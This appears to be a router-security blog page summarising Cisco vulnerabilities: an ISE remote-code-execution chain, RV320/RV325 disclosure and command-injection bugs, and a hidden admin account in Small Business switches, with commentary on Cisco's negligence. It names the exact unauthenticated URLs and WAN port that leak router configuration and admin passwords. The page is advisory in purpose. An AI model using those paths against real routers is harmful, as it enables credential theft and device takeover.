I don't care much about the details here, and the bugs are not in a router. But Cisco makes routers and the bigger issue, to me, is just how trustworthy Cisco is. They appear on this bug list often. Would you buy a router from them? Quoting: "ISE is distributed by Cisco as a virtual appliance. We have analysed version 2.4.0.357 and found three vulnerabilities ... By putting them all together, we can achieve remote code execution as root, provided we can trap an administrator into visiting the page vulnerable to the stored cross site scripting." Agile dealt with Cisco about these bugs and it did not go well, leading to Ribeiro saying "These actions show Cisco is incredibly negligent with regards to the security of their customers. They are still shipping (and recommending) a product version vulnerable to unauthenticated remote code execution, with a fully working public exploit and no way to track fixes or fixed versions for these vulnerabilities." Ouch.
Three bugs in two Cisco routers
Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability
a Cisco Security Advisory January 23, 2019
This happened fast. In September 2018, three bugs were reported to Cisco by German security firm RedTeam Pentesting. Cisco released patches for the bugs on January 23, 2019. The next day, proof of concept software was released that exploited the bugs. The day after that, bad guys were scanning for vulnerable Cisco routers. The bugs are exploitable on both the LAN and WAN side using just HTTP and/or HTTPS GET requests. The first two bugs expose information about the router to anyone who asks - no password is needed. One of these bugs exposes the Admin password. With that, bad guys can abuse the third bug to run any Linux command on the box. The vulnerable URLs are
http://1.2.3.4/cgi-bin/config.exp and
http://1.2.3.4/cgi-bin/export_debug_msg.exp
where 1.2.3.4 is either the LAN side or WAN side IP address of the router. The bugs are CVE-2019-1653 and CVE-2019-1652. The Cisco RV320 and RV325 routers are popular among both ISPs and large enterprises. On the WAN side, the web interface is exposed on TCP port 8007. Information about attacks on these bugs is on the News page.
Many Cisco switches have a backdoor account
Critical, Unpatched Cisco Flaw Leaves Small Business Networks Wide Open
by Tara Seals of Threatpost January 18, 2019
These Cisco Small Business switches are vulnerable to full remote takeover thanks to a backdoor account: the 200 and 250 Series Smart Switches, the 300 and 350 Series Managed Switches, the 350X, 500 and 550X Series Stackable Managed Switches. There is no patch, but there is a work-around. The most interesting question is whether this is a bug or a feature. It looks like a bug in that it has an official CVE number (CVE-2018-15439) and a critical base CVSS severity rating of 9.8 (really bad). The devices ship with an in-built privileged user account that is used for the initial login. This account can not be removed. It is defined in a software-internal data structure and it's not visible in either the running configuration or the startup configuration of an affected device. Bad guys can use this account to log in to a vulnerable device and execute commands with full admin privileges. The work-around is creating a user account with access privilege level of 15 (or higher?). But, if that account gets deleted, the hidden one works again, without notifying system administrators. It sure feels like a back door that can be easily hidden in case the virtual cops are coming. Why else hide the existence of this in-built account? Also, there have been many other backdoors discovered in Cisco software over the last year or so. It has been about 3 months and still no patch.
To keep this page small, router bugs from earlier years have been omitted by default. To see them, click the buttons below.